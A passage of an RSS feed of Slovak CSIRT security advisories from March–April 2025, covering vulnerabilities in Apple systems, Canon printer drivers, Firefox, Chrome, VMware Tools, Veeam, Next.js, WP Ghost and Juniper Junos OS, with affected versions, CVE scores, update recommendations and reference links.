<li>CVE-2025-24097 – umožňuje prístup k metadátam ľubovoľných súborov</li>



<li>CVE-2025-31182 – umožňuje mazanie ľubovoľných súborov</li>
</ul>



<p>123 zraniteľností v <strong>macOS Sequoia</strong>, vrátane</p>



<ul>
<li>CVE-2025-24228 – umožňuje vykonávať ľubovoľný kód s oprávneniami jadra</li>



<li>CVE-2025-24267 – umožňuje zvýšenie oprávnení na úroveň používateľa root</li>



<li>CVE-2025-24178 – umožňuje únik zo sandboxu</li>
</ul>



<p>13 zraniteľností v prehliadači <strong>Safari</strong>, vrátane</p>



<ul>
<li>CVE-2025-24213 – vedie ku poškodeniu pamäte komponentu WebKit</li>



<li>CVE-2025-30427 – súvisí s možnosťou použitia dealokovanej pamäte</li>



<li>CVE-2025-24180 – súvisí s chybou pri spracovaní prihlasovacích údajov v komponente WebAuthn</li>
</ul>



<p>Ďalšie zraniteľnosti boli opravené v <strong>tvOS</strong> a <strong>visionOS.</strong></p>



<p><strong><u>Opravy zneužívaných zraniteľností na starších systémoch</u></strong></p>



<p><a href="https://csirt.sk/posts/2007.html">CVE-2025-24200</a><strong> </strong>(CVSS v4.0 skóre: 7,0)</p>



<p>Spoločnosť vydala aktualizácie zraniteľnosti umožňujúcej deaktiváciu bezpečnostného mechanizmu USB Restricted Mode na zamknutých zariadeniach pre staršie systémy iOS a iPadOS 15 a 16.</p>



<p><a href="https://www.csirt.sk/posts/2178.html">CVE-2025-24201</a> (CVSS skóre: 8,8)</p>



<p>Spoločnosť vydala aktualizácie zraniteľnosti v komponente WebKit umožňujúcej únik z Web Content sandboxu a vzdialené vykonanie kódu pre staršie systémy iOS a iPadOS 15 a 16.</p>



<p><a href="https://csirt.sk/posts/1986.html">CVE-2025-24085</a><strong> </strong>(CVSS skóre: 7,8)</p>



<p>Spoločnosť vydala aktualizácie zraniteľnosti v komponente Core Media umožňujúcej eskaláciu privilégií pre staršie systémy macOS Sonoma 14, macOS Ventura 13 a iPadOS 17.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Eskalácia oprávnení</strong></li>



<li><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia systémov Apple aspoň na verzie:</p>



<ul>
<li>iOS 15.8.4</li>



<li>iOS 16.7.11</li>



<li>iOS 18.4</li>



<li>iPadOS 15.8.4</li>



<li>iPadOS 16.7.11</li>



<li>iPadOS 17.7.6</li>



<li>iPadOS 18.4</li>



<li>macOS Ventura 13.7.5</li>



<li>macOS Sonoma 14.7.5</li>



<li>macOS Sequoia 15.4</li>
</ul>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.bleepingcomputer.com/news/security/apple-backports-zero-day-patches-to-older-iphones-and-macs/">https://www.bleepingcomputer.com/news/security/apple-backports-zero-day-patches-to-older-iphones-and-macs/</a></li>



<li><a href="https://thehackernews.com/2025/04/apple-backports-critical-fixes-for-3.html">https://thehackernews.com/2025/04/apple-backports-critical-fixes-for-3.html</a></li>



<li><a href="https://www.csirt.sk/posts/2007.html">https://www.csirt.sk/posts/2007.html</a></li>



<li><a href="https://www.csirt.sk/posts/2178.html">https://www.csirt.sk/posts/2178.html</a></li>



<li><a href="https://www.csirt.sk/posts/1986.html">https://www.csirt.sk/posts/1986.html</a></li>



<li><a href="https://support.apple.com/en-us/122371">https://support.apple.com/en-us/122371</a></li>



<li><a href="https://support.apple.com/en-us/122373">https://support.apple.com/en-us/122373</a></li>



<li><a href="https://support.apple.com/en-us/122379">https://support.apple.com/en-us/122379</a></li>



<li><a href="https://support.apple.com/en-us/122377">https://support.apple.com/en-us/122377</a></li>



<li><a href="https://support.apple.com/en-us/122378">https://support.apple.com/en-us/122378</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2237/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností marec 2025</title>
		<link>/posts/2233</link>
					<comments>/posts/2233#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 01 Apr 2025 12:10:03 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2233</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci marec 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci marec 2025.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/04/2025_03_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 03/2025 PDF (549 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2233/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť tlačiarní Canon</title>
		<link>/posts/2226</link>
					<comments>/posts/2226#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 31 Mar 2025 08:50:11 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Canon]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2226</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/03/canon.png" alt="" /></p>Spoločnosť Canon opravila kritickú zraniteľnosť v&#160;ovládačoch viacerých svojich zariadení, ktorá umožňuje znefunkčniť tlač, a&#160;potenciálne vykonať ľubovoľný kód. Zraniteľné systémy: Opis...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/03/canon.png" alt="" /></p>
<p><strong>Spoločnosť Canon opravila kritickú zraniteľnosť v&nbsp;ovládačoch viacerých svojich zariadení, ktorá umožňuje znefunkčniť tlač, a&nbsp;potenciálne vykonať ľubovoľný kód.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Generic Plus PCL6 Printer Driver &#8211; V3.12 a staršie</li>



<li>Generic Plus UFR II Printer Driver &#8211; V3.12 a staršie</li>



<li>Generic Plus LIPS4 Printer Driver &#8211; V3.12 a staršie</li>



<li>Generic Plus LIPSLX Printer Driver &#8211; V3.12 a staršie</li>



<li>Generic Plus PS Printer Driver &#8211; V3.12 a staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-1268</strong> (CVSSv3.1 skóre 9,4)</p>



<p>Vývojári spoločnosti Canon opravili kritickú zraniteľnosť v ovládačoch niektorých zariadení, ktorá súvisí s možnosťou pristupovať k pamäti mimo povolené hodnoty pri spracovaní EMF Recode. Neautentifikovaný útočník so sieťovým prístupom môže po jej úspešnom zneužití pri spracovaní tlačovej úlohy dosiahnuť zamedzenie tlače a potenciálne získať schopnosť vykonať ľubovoľný kód.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Nedostupnosť služby (DoS)</strong></li>



<li><strong>Vykonávanie ľubovoľného kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia ovládačov Generic Plus PCL6 Printer Driver, Generic Plus UFR II Printer Driver, Generic Plus LIPS4 Printer Driver, Generic Plus LIPSLX Printer Driver a Generic Plus PS Printer Driver na najnovšiu verziu (novšiu ako V3.12).</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://psirt.canon/advisory-information/cp2025-003/">https://psirt.canon/advisory-information/cp2025-003/</a></li>



<li><a href="https://gbhackers.com/canon-printer-vulnerability/">https://gbhackers.com/canon-printer-vulnerability/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2226/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť Mozilla Firefox</title>
		<link>/posts/2223</link>
					<comments>/posts/2223#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 28 Mar 2025 13:32:55 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[Mozilla]]></category>
		<guid isPermaLink="false">/?p=2223</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/03/Mozilla_Firefox-1024x659.png" alt="" /></p>Spoločnosť Mozilla opravila kritickú chybu vo svojom prehliadači Firefox, ktorá v&#160;OS Windows umožňuje vykonať únik zo sandboxu prehliadača. Zraniteľnosť sa...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/03/Mozilla_Firefox-1024x659.png" alt="" /></p>
<p><strong>Spoločnosť Mozilla opravila kritickú chybu vo svojom prehliadači Firefox, ktorá v&nbsp;OS Windows umožňuje vykonať únik zo sandboxu prehliadača. Zraniteľnosť sa podobá na CVE-2025-2783, ktorú v&nbsp;súčasnosti opravila spoločnosť Google vo svojom prehliadači Chrome.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Mozilla Firefox pre Windows verzie staršej ako 136.0.4</li>



<li>Firefox ESR pre Windows verzie staršej ako 128.8.1</li>



<li>Firefox ESR pre Windows verzie staršej ako 115.21.1</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-2857</strong></p>



<p>Spoločnosť Mozilla vydala aktualizáciu internetového prehliadača Firefox na opravu kritickej zraniteľnosti CVE-2025-2857, ktorá umožňuje útočníkom obísť sandboxovú ochranu prehliadača na systémoch Windows. Útočník dokáže zneužiť nešpecifikovaný proces potomka tak, aby cez svoj rodičovský proces spôsobil únik zo sandboxu prehliadača. </p>



<p>Zraniteľnosť sa podobná na <a href="https://www.csirt.sk/posts/2208.html">CVE-2025-2783</a>, ktorá bola opravená nedávno v prehliadači Google Chrome. Zraniteľnosť v Chrome bola aktívne zneužívaná.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia prehliadača spoločnosti Mozilla aspoň na verzie Firefox 136.0.4, Firefox ESR 128.8.1, alebo Firefox ESR 115.21.1.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.mozilla.org/en-US/security/advisories/mfsa2025-19/#CVE-2025-2857">https://www.mozilla.org/en-US/security/advisories/mfsa2025-19/#CVE-2025-2857</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/mozilla-warns-windows-users-of-critical-firefox-sandbox-escape-flaw/">https://www.bleepingcomputer.com/news/security/mozilla-warns-windows-users-of-critical-firefox-sandbox-escape-flaw/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2223/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>VMware Tools pre Windows umožňuje obísť autentifikáciu</title>
		<link>/posts/2210</link>
					<comments>/posts/2210#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 26 Mar 2025 14:51:36 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[VMware]]></category>
		<guid isPermaLink="false">/?p=2210</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>Vývojári VMware Tools pre Windows opravili vo svojom produkte zraniteľnosť vysokej závažnosti, ktorá umožňuje obídenie autentifikácie a&#160;získanie oprávnení administrátora pre...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/vmware-workstation-logo.jpg" alt="" /></p>
<p><strong>Vývojári VMware Tools pre Windows opravili vo svojom produkte zraniteľnosť vysokej závažnosti, ktorá umožňuje obídenie autentifikácie a&nbsp;získanie oprávnení administrátora pre isté úkony v&nbsp;rámci kompromitovaného virtuálneho prostredia.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>VMware Tools pre Windows 11.x.x a&nbsp;12.x.x</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-22230</strong> (CVSS skóre 7,8)</p>



<p>Spoločnosť VMware opravila vysoko závažnú zraniteľnosť v&nbsp;produkte VMware Tools pre Windows, ktorá umožňuje obídenie autentifikácie z&nbsp;dôvodu nedostatočnej kontroly prístupov. To môže útočník s&nbsp;nižšími oprávneniami zneužiť na vykonanie zmien na virtuálnom stroji, ktoré vyžadujú administrátorské oprávnenia.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia VMware Tools pre Windows aspoň na verziu 12.5.1.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25518">https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25518</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2210/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická aktívne zneužívaná zraniteľnosť Google Chrome</title>
		<link>/posts/2208</link>
					<comments>/posts/2208#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 26 Mar 2025 14:50:35 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Chrome]]></category>
		<guid isPermaLink="false">/?p=2208</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>Google opravil kritickú zraniteľnosť vo svojom prehliadači Chrome pre Windows, ktorá umožňuje únik zo sandboxu. Zraniteľnosť je aktívne zneužívaná. Zraniteľné...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>
<p><strong>Google opravil kritickú zraniteľnosť vo svojom prehliadači Chrome pre Windows, ktorá umožňuje únik zo sandboxu. Zraniteľnosť je aktívne zneužívaná.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Google Chrome, verzie staršie ako 134.0.6998.177</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-2783 </strong>(CVSSv3 skóre 9,8)</p>



<p>Spoločnosť Google opravila kritickú zraniteľnosť vo verzii svojho prehliadača pre Windows, ktorá kvôli logickej chybe na rozhraní prehliadača a OS umožňuje únik z jeho sandboxu. Nachádza sa v komponente Mojo.</p>



<p>Zraniteľnosť je aktuálne aktívne zneužívaná pri útokoch na ruské spoločnosti. Objavili ju výskumníci spoločnosti Kaspersky, Boris Larin a Igor Kuznetsov.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Google Chrome aspoň na verziu 134.0.6998.177/.178. Odporúčame aktualizovať aj iné prehliadače postavené na platforme Chromium.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://thehackernews.com/2025/03/zero-day-alert-google-releases-chrome.html">https://thehackernews.com/2025/03/zero-day-alert-google-releases-chrome.html</a></li>



<li><a href="https://www.tenable.com/plugins/nessus/233331">https://www.tenable.com/plugins/nessus/233331</a></li>



<li><a href="https://chromereleases.googleblog.com/2025/03/stable-channel-update-for-desktop_25.html">https://chromereleases.googleblog.com/2025/03/stable-channel-update-for-desktop_25.html</a></li>



<li><a href="https://www.kaspersky.com/blog/forum-troll-apt-with-zero-day-vulnerability/53215/">https://www.kaspersky.com/blog/forum-troll-apt-with-zero-day-vulnerability/53215/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2208/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť Veeam Backup &#038; Replication</title>
		<link>/posts/2205</link>
					<comments>/posts/2205#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 25 Mar 2025 16:14:43 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Veeam]]></category>
		<guid isPermaLink="false">/?p=2205</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>Spoločnosť Veeam opravila kritickú zraniteľnosť v produkte Backup &#38; Replication, ktorá umožňuje útočníkovi s&#160;oprávneniami doménového používateľa vzdialene vykonávať kód na...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/05/veeam-full-1024x680.png" alt="" /></p>
<p><strong>Spoločnosť Veeam opravila kritickú zraniteľnosť v produkte</strong> <strong>Backup &amp; Replication, ktorá umožňuje útočníkovi s&nbsp;oprávneniami doménového používateľa vzdialene vykonávať kód na serveri Backup Server.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Veeam Backup &amp; Replication build 12, až po verziu 12.3.0.310</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-23120 </strong>(CVSS skóre 9,9)</p>



<p>Kritická zraniteľnosť umožňuje autentifikovanému používateľovi z lokálnej skupiny, alebo doménovému používateľovi vzdialene vykonávať kód na Backup Server. Chyba spočíva v neošetrenej deserializácii v triedach <em>Veeam.Backup.Core.BackupSummary</em> a <em>xmlFrameworkDs</em>.</p>



<p>Zraniteľnosť objavili výskumníci zo spoločnosti watchTowr a existuje pre ňu verejne dostupná ukážka jej zneužitia (PoC).</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Veeam Backup &amp; Replication aspoň na <a href="https://www.veeam.com/kb4696">verziu 12.3.1</a><strong>.</strong></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.veeam.com/kb4724">https://www.veeam.com/kb4724</a></li>



<li><a href="https://arcticwolf.com/resources/blog/cve-2025-23120/">https://arcticwolf.com/resources/blog/cve-2025-23120/</a></li>



<li><a href="https://labs.watchtowr.com/by-executive-order-we-are-banning-blacklists-domain-level-rce-in-veeam-backup-replication-cve-2025-23120/">https://labs.watchtowr.com/by-executive-order-we-are-banning-blacklists-domain-level-rce-in-veeam-backup-replication-cve-2025-23120/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2205/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť Next.js</title>
		<link>/posts/2202</link>
					<comments>/posts/2202#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 25 Mar 2025 16:12:27 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Next.js]]></category>
		<guid isPermaLink="false">/?p=2202</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/03/next_js.png" alt="" /></p>Framework Next.js obsahuje kritickú zraniteľnosť, ktorá umožňuje útočníkom obísť kontroly autorizácie pomocou špeciálne vytvorených požiadaviek, ak prebiehajú v&#160;Middleware a&#160;ďalej už...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/03/next_js.png" alt="" /></p>
<p><strong>Framework Next.js obsahuje kritickú zraniteľnosť, ktorá umožňuje útočníkom obísť kontroly autorizácie pomocou špeciálne vytvorených požiadaviek, ak prebiehajú v&nbsp;Middleware a&nbsp;ďalej už nie.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Next.js 15.0.0 až staršie ako 15.2.3</li>



<li>Next.js 14.0.0 až staršie ako 14.2.25</li>



<li>Next.js 13.0.0 až staršie ako 13.5.9</li>



<li>Next.js 11.1.4 až staršie ako 12.3.5</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-29927 </strong>(CVSS skóre 9,1)</p>



<p>Kritická zraniteľnosť umožňuje obísť kontroly autorizácie v rámci inštancií Next.js, ak kontroly prebiehajú v Middleware a aplikácie používajú funkciu <em>next start</em> s parametrom <em>output: ‘standalone‘</em>.</p>



<p>Útočník na to môže zneužiť požiadavky s určitou hodnotou hlavičky <em>x-middleware-subrequest</em>, ktorá spôsobí, že kontrola požiadavky v Middleware sa preskočí, a funkcia <em>NextResponse.next()</em> ju prepošle priamo do cieľového bodu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia aspoň na verziu:</p>



<ul>
<li>Next.js 15.x na verziu 15.2.3</li>



<li>Next.js 14.x na verziu 14.2.25</li>



<li>Next.js 13.x na verziu 13.5.9</li>



<li>Next.js 12.x na verziu 12.3.5</li>
</ul>



<p>Ak aktualizácia nie je možná, pre mitigáciu zraniteľnosti zakážte dostupnosť aplikácie Next.js pre externé požiadavky s hlavičkou <em>x-middleware-subrequest</em>.</p>



<p>Inštancie Next.js hostované cez riešenie Vercel a Netlify sú chránené voči danej zraniteľnosti.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://github.com/advisories/GHSA-f82v-jwr5-mffw">https://github.com/advisories/GHSA-f82v-jwr5-mffw</a></li>



<li><a href="https://nextjs.org/blog/cve-2025-29927">https://nextjs.org/blog/cve-2025-29927</a></li>



<li><a href="https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware">https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2202/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť modulu WordPress Ghost</title>
		<link>/posts/2200</link>
					<comments>/posts/2200#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 25 Mar 2025 16:07:47 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Ghost]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=2200</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>V&#160;module WordPress Ghost bola opravená kritická zraniteľnosť, ktorá umožňuje vzdialene vykonávať kód. Chyba spočíva v&#160;možnosti vykonávať útoky typu LFI manipuláciou...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/WordPress_blue_logo.svg-min-e1753368452292-1024x735.png" alt="" /></p>
<p><strong>V&nbsp;module WordPress Ghost bola opravená kritická zraniteľnosť, ktorá umožňuje vzdialene vykonávať kód. Chyba spočíva v&nbsp;možnosti vykonávať útoky typu LFI manipuláciou odkazu URL.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WordPress Ghost verzie 5.4.01 a staršie</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-26909</strong> (CVSS skóre 9,6)</p>



<p>Kritická zraniteľnosť umožňuje neautentifikovanému útočníkovi vzdialene vykonávať kód. Chyba spočíva v&nbsp;nedostatočnom overovaní používateľských vstupov vo funkcii <em>showFile()</em>, čo umožňuje&nbsp;útočníkovi prechádzať medzi adresármi a vkladať ľubovoľné súbory servera do upraveného odkazu URL (útok typu Local File Inclusion).</p>



<p>Zraniteľnosť je aktívna, ak je vlastnosť <em>Change Paths</em> nastavená na mód&nbsp;<em>Lite</em> alebo <em>Ghost</em>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia modulu WordPress Ghost aspoň na verziu 5.4.02. Zraniteľnosť možno mitigovať zmenou nastavenia vlastnosti <em>Change Paths</em> na iný mód, ako&nbsp;<em>Lite</em> alebo <em>Ghost</em>.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://patchstack.com/articles/critical-lfi-to-rce-vulnerability-in-wp-ghost-plugin-affecting-200k-sites/">https://patchstack.com/articles/critical-lfi-to-rce-vulnerability-in-wp-ghost-plugin-affecting-200k-sites/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/wordpress-security-plugin-wp-ghost-vulnerable-to-remote-code-execution-bug/">https://www.bleepingcomputer.com/news/security/wordpress-security-plugin-wp-ghost-vulnerable-to-remote-code-execution-bug/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2200/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností február 2025</title>
		<link>/posts/2195</link>
					<comments>/posts/2195#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 24 Mar 2025 11:09:31 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2195</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci február 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci február 2025.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/04/2025_02_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 02/2025 PDF (549 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2195/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť v operačnom systéme Juniper Junos OS</title>
		<link>/posts/2191</link>
					<comments>/posts/2191#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 19 Mar 2025 15:57:43 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Juniper]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2191</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/03/Juniper_Networks-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Juniper vydala bezpečnostné aktualizácie pre svoj sieťový operačný systém Junos OS, ktoré opravujú aktívne zneužívanú zraniteľnosť. CVE-2025-21590 by lokálny...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/03/Juniper_Networks-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Juniper vydala bezpečnostné aktualizácie pre svoj sieťový operačný systém Junos OS, ktoré opravujú aktívne zneužívanú zraniteľnosť. CVE-2025-21590 by lokálny útočník s prístupom k shell-u mohol zneužiť na obídenie bezpečnostného mechanizmu Veriexec, vykonanie škodlivého kódu a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Junos OS vo všetkých verziách starších ako 21.2R3-S9</li>



<li>Junos OS 21.4 vo verziách starších ako 21.4R3-S10</li>



<li>Junos OS 22.2 vo verziách starších ako 22.2R3-S6</li>



<li>Junos OS 22.4 vo verziách starších ako 22.4R3-S6</li>



<li>Junos OS 23.2 vo verziách starších ako 23.2R2-S3</li>



<li>Junos OS 23.4 vo verziách starších ako 23.4R2-S4</li>



<li>Junos OS 24.2 vo verziách starších ako 24.2R1-S2, 24.2R2</li>
</ul>



